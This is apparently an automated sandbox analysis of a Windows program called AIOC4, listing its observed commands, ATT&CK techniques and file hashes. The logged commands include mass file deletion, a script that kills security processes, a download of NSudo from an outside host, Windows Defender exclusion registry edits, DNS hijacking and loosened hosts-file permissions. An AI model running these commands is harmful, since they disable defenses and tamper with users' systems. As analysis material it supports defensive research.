C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*geek*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cad*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*cadallclear*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*iobit*uninstall*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Dism++*"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C DEL /F /S /A /Q "C:\Users\*Total*Uninstal*"7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /B C:\\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\$Recycle.Bin\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\Documents and Settings\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\odt\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\Program Files\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\Program Files (x86)\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\ProgramData\*AUTO*Uninstaller*7⤵
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /C DIR /AD /S /B C:\Users\*AUTO*Uninstaller*7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C killav.bat6⤵
-
C:\Windows\system32\choice.exeCHOICE /T 1 /D y /n7⤵
-
C:\Windows\system32\find.exefind /i "aioc4.exe"7⤵
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\taskkill.exetaskkill /im "360bpsvc.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "360huabao.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "360wpsrv.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "ABCtpoprytx.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "AU_CN.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "bqpb.exe" /f7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "Cleaner One.exe" /f7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "ComputerZService.exe" /f7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "convHelper.exe" /f7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /im "convServer.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "convSpeedup.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Dwight.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "EasiUpdate3.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "EasiUpdate3Protect.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "ECAgent.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "escsvc64.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "fastpic.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "FeiRarNews.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "fpprotect.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "FZip.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "geek.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloDesktop64.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloSearch.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloTheme.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloTray.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "iOSDRServer.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "iOSSU.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Jsbyptp.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "KGPMService.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "ktpb.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "kvipgui.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kzyptp.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kdeskcore.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "keyemain.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kwallpaper.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kwallpaperex.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "LDSGameHall.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "LockApp.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "lsmain.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "Margot.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "mctray.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "MelonTray.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "pbxhone.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "pdfServer.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "pdfspeedup.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "pdholder.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "QuickSeeTray.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "speedup.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "vip.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "vrol.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "WpTinyTray.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "WRSvn.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "WRtlname.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "WRUtest.exe" /f7⤵
-
C:\Windows\system32\sc.exesc stop "360bpsvc"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "convServer"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "EasiUpdate3"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "EasiUpdate3Protect"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "EasyAntiCheat"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "EpsonScanSvc"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "FastPDFSvc"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "iOSDRServer"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "KGPMSYS"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "kzipservice"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "masterPDF_Server"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "QuickSeeSvc"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "SangforSP"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "VRLService"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "WRSvnV1"7⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop "wrzipservice"7⤵
- Launches sc.exe
-
C:\Windows\system32\choice.exeCHOICE /T 1 /D y /n7⤵
-
C:\Windows\system32\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\find.exefind /i "aioc4.exe"7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "360bpsvc.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "360huabao.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "360wpsrv.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "ABCtpoprytx.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "AU_CN.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "bqpb.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Cleaner One.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "ComputerZService.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "convHelper.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "convServer.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "convSpeedup.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Dwight.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "EasiUpdate3.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "EasiUpdate3Protect.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "ECAgent.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "escsvc64.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "fastpic.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "FeiRarNews.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "fpprotect.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "FZip.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "geek.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloDesktop64.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloSearch.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloTheme.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "HaloTray.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "iOSDRServer.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "iOSSU.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Jsbyptp.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "KGPMService.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "ktpb.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "kvipgui.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kzyptp.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "kdeskcore.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "keyemain.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kwallpaper.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "kwallpaperex.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "LDSGameHall.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "LockApp.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "lsmain.exe" /f7⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /im "Margot.exe" /f7⤵
-
C:\Windows\system32\taskkill.exetaskkill /im "mctray.exe" /f7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\J.R.A"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C MD "C:\ProgramData\J.R.A"6⤵
-
C:\Program Files\AIOC4\aria2\x64\aria2c.exe"C:\Program Files\AIOC4\aria2\x64\aria2c.exe" http://www.qbgxl.com/Tools/NSudoLauncher.7z -s 20 -x 10 -d "C:\Program Files\AIOC4\AIOC_Cache\Tools" -o "NSudoLauncher.7z" --check-certificate=false --async-dns=false --async-dns-server=114.114.114.114,61.160.195.64,8.8.8.86⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\AIOC4\7-Zip\x64\7z.exe"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa6⤵
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:T -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files\AIOC4\\" /t REG_DWORD /d 0 /f6⤵
-
C:\Program Files\AIOC4\7-Zip\x64\7z.exe"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa6⤵
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:T -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\\" /t REG_DWORD /d 0 /f6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C MD "AIOC_Cache\UpdateError\"6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C TAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y6⤵
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\AIOC4\AIOC_Cache\21459827.bat"6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh interface show interface7⤵
-
C:\Windows\system32\netsh.exenetsh interface show interface8⤵
-
C:\Windows\system32\netsh.exenetsh interface ip set dns "Ethernet" static 114.114.114.1147⤵
-
C:\Windows\system32\netsh.exenetsh interface ip add dns "Ethernet" 61.160.195.647⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ICACLS "C:\Windows\system32\drivers\etc" /grant:r Everyone:(OI)(CI)(F)6⤵
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\system32\drivers\etc" /grant:r Everyone:(OI)(CI)(F)7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C TAKEOWN /F "C:\Windows\system32\drivers\etc\hosts"6⤵
-
C:\Windows\system32\takeown.exeTAKEOWN /F "C:\Windows\system32\drivers\etc\hosts"7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ICACLS "C:\Windows\system32\drivers\etc\hosts" /grant:r Everyone:(F)6⤵
-
C:\Windows\system32\icacls.exeICACLS "C:\Windows\system32\drivers\etc\hosts" /grant:r Everyone:(F)7⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ATTRIB -R -H -S "C:\Windows\system32\drivers\etc\hosts" /S /D /L6⤵
-
C:\Windows\system32\attrib.exeATTRIB -R -H -S "C:\Windows\system32\drivers\etc\hosts" /S /D /L7⤵
- Views/modifies file attributes
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C w32tm /resync6⤵
-
C:\Windows\system32\w32tm.exew32tm /resync7⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Modify Existing Service
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Modify Registry
2Impair Defenses
1File Permissions Modification
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\AIOC4\7-Zip\x64\7z.dllFilesize
1.6MB
MD53c0e5f27997c83592a01feb4c1fc0754
SHA13d7920deb74e340a1ccac024b3f8239eb436c11f
SHA2564d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243
SHA51283e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb
-
C:\Program Files\AIOC4\7-Zip\x64\7z.dllFilesize
1.6MB
MD53c0e5f27997c83592a01feb4c1fc0754
SHA13d7920deb74e340a1ccac024b3f8239eb436c11f
SHA2564d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243
SHA51283e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb
-
C:\Program Files\AIOC4\7-Zip\x64\7z.dllFilesize
1.6MB
MD53c0e5f27997c83592a01feb4c1fc0754
SHA13d7920deb74e340a1ccac024b3f8239eb436c11f
SHA2564d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243
SHA51283e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb
-
C:\Program Files\AIOC4\7-Zip\x64\7z.exeFilesize
472KB
MD58fc504a26d59a4459604755ffcafeb4f
SHA1d503ae8d5ad76948858cfff34858c5de5a5b96d6
SHA256447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78
SHA512d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817
-
C:\Program Files\AIOC4\7-Zip\x64\7z.exeFilesize
472KB
MD58fc504a26d59a4459604755ffcafeb4f
SHA1d503ae8d5ad76948858cfff34858c5de5a5b96d6
SHA256447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78
SHA512d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817
-
C:\Program Files\AIOC4\7-Zip\x64\7z.exeFilesize
472KB
MD58fc504a26d59a4459604755ffcafeb4f
SHA1d503ae8d5ad76948858cfff34858c5de5a5b96d6
SHA256447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78
SHA512d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817
-
C:\Program Files\AIOC4\AIOC4.exeFilesize
7.3MB
MD58d22332dfd13fb7b23ee933d5d13680b
SHA140ea83aae67d765159ee98ca68d3679696501d5f
SHA2561c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437
SHA512cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa
-
C:\Program Files\AIOC4\AIOC4.exeFilesize
7.3MB
MD58d22332dfd13fb7b23ee933d5d13680b
SHA140ea83aae67d765159ee98ca68d3679696501d5f
SHA2561c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437
SHA512cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa
-
C:\Program Files\AIOC4\AIOC4.exeFilesize
7.3MB
MD58d22332dfd13fb7b23ee933d5d13680b
SHA140ea83aae67d765159ee98ca68d3679696501d5f
SHA2561c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437
SHA512cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa
-
C:\Program Files\AIOC4\AIOC4.exeFilesize
7.3MB
MD58d22332dfd13fb7b23ee933d5d13680b
SHA140ea83aae67d765159ee98ca68d3679696501d5f
SHA2561c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437
SHA512cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa
-
C:\Program Files\AIOC4\AIOC4.exeFilesize
7.3MB
MD58d22332dfd13fb7b23ee933d5d13680b
SHA140ea83aae67d765159ee98ca68d3679696501d5f
SHA2561c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437
SHA512cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa
-
C:\Program Files\AIOC4\AIOC4.exe.configFilesize
294B
MD5312788103822de83bfcc14977cf85ce2
SHA1ad849ac3d9f865f51233ef91069b195768a72e08
SHA25642bb5911dc77bee5fef62a7557d76f57e03a615900ebc720cd0a8b7573e3fa3b
SHA512dd8140619b7b31b0195671080f3ee4a18197458835fc9c38e3a5f02c15b539ba92dcd978bf0231ed4857e3a0b9215a8df860503099542bf5b0d87821ff0b2558
-
C:\Program Files\AIOC4\AIOC_Cache\21459827.batFilesize
394B
MD51674c8ec8f0267dc45853ac0cbc25d56
SHA135d4f82bd7e8c4db2b4f0133c9594d70d00eb15a
SHA256ed4347c35495059f1b3ea0f066ee53c81b1b934da3d54cca433250e5eb07fea5
SHA51221b7a3d59783adfb572b87031cef2ac9f457bff5ea449814a9a33450cf7c8ebf94169599908af02e9819475b93c10ca0569f4f53dde72af1f2a5cd536c927b8d
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XMLFilesize
3KB
MD5d2b5064c27616136cfedadb391a27de2
SHA1357f45eda635ef54074d57bda4cb499b6a0f51bc
SHA256249938dd3dad92a65a9e6e1a5103b1d17e82afeb6dc2880273b901e08631e49d
SHA5120433bc503f78eed90f6ce99abba3c9a7e0d7ae83c6c12e122ee1dd0d6636fae8253727e845d9a5ec2da23eb4db85c5a2fc2240c1af010ae71cc00ad29dc132f0
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7zFilesize
2.5MB
MD5bf1324d35b37d4c2283ca20351b05aea
SHA1b09912a252b29a2da6d869cfee40aff247b49e8a
SHA256e0eb38802df4fb7d07823337b5c6da941f99b189defc89d35d2df80a5a6d0488
SHA512f1d9169ad65d54bd8297ac294ca6791ea37c9a739e0805c355640bde88acf20f433a142c175908a533ce18bcc2b9bdcb2a14ac472b8e4d0845b1410bae36d380
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudo.jsonFilesize
211B
MD5922322fab45a284dbb248760125dfb1c
SHA1120e77b90baa85287b2ee5bc63ff7dcd149767b5
SHA256254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5
SHA512899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.exeFilesize
130KB
MD59927132299134787994eedd49aca8446
SHA1cbcace85923e335bb37e8b6e634fb6a98c22a8e9
SHA2561567615d183ef92472f20c6a70800a00bd7e834ddc3016c6f4c725d38cbf68d7
SHA512d810d4e8e8f97ac47ef60fe65ca79041f3be75112e4079109b34d49fe44f2fe5462b92863592dce83fc5e33808ced670a431b583732da6244a1fa60e832cd6c7
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.pdbFilesize
2.0MB
MD584a46255a1d093ac022be86b316a715b
SHA19bba555d9226c454bf886228bd8d411d4006d1f3
SHA2563c0ce2e72e82110faa6f7ee43d66da1b65ae886754644263cccb4bd1beaffb14
SHA512379bb59da1e0aded1b28535aca3312c5cf61d6a7e969100cf3c889a8b62b3c6cbb359b04c4105a815e9e7f7411494420842c00a8b355abf51b0d59cbcc54652e
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.exeFilesize
149KB
MD5ecb684e37a8d5fc9fc0dd2d12ec4695a
SHA1c76e31d62c9ebf650c708ce31897bad7de285bcc
SHA2565825f03916aadc2d268f376beb29e52bec9b031045bbff728d300164a81e14a2
SHA512295d21df45516d611ca18ce9cc6ff1be3f4b5315927d2fde071bb3614664ccb998786736f2a70afb74a0602d1c9fa6867376d3af295b78006d715ef487ef4440
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.pdbFilesize
4.0MB
MD5859d1a5661742c998f3bce668de4b594
SHA1673e8dc32a0a13f25431ac82f7b6498ee512552a
SHA256b7e2c43d68b6a849e46305f7313ec161f994c38609750d6a788ee8944e8b1b24
SHA512550268f514dc641101b0f0cd6453a7cbb7076f9fca2e72e7372d42cf5d5eb2bbf773ceae1ae2245021cca00f5f0b25886edafa2fd5bcbd7140e8b6811dd92578
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\NSudo.batFilesize
234B
MD5943b19a7ab8b31c13d6359345389e802
SHA1562ee7a4b7f481fb43b1cf55144de39005dadab4
SHA2561b770ee7c2c58cc069d992cfd13def84c11cf3ed51559f365f4fed829359b54d
SHA512df90f2f716acbccbcdbb64981bf3f8727e34ecb8420c32c3bdc2f69e3e9edaeb31e4f815b95ed0b0ae60a86349fa39b81b6030848862403554bb00fcfde24967
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudo.jsonFilesize
211B
MD5922322fab45a284dbb248760125dfb1c
SHA1120e77b90baa85287b2ee5bc63ff7dcd149767b5
SHA256254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5
SHA512899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.exeFilesize
123KB
MD5f2234dbe80136d9bd03417b9c0f4a48c
SHA1233e2c88e8fc719f80f10e016a1fa4f99e5a7ede
SHA2560c6556ff186fdf38207fb4f38a1157b24834777c2e4390c10b829b7fd1064fd7
SHA512fe444173fd26ddb2f7b40822de5264c13b52e03f2bd1fbbe2422e1c2cecb68e1311d107d7a735e7ef8129d6d8877c6db093027737b2ca74f0800967255df847c
-
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.pdbFilesize
2.1MB
MD574a6d09e9eb9b9857741ec919274ee52
SHA1c2f271971908a06c45248b62ebe3432c46ed3aba
SHA256a39630d8d8dd72225cc32f6f349ed9f70f37e673321605258c194da7021b7b0b
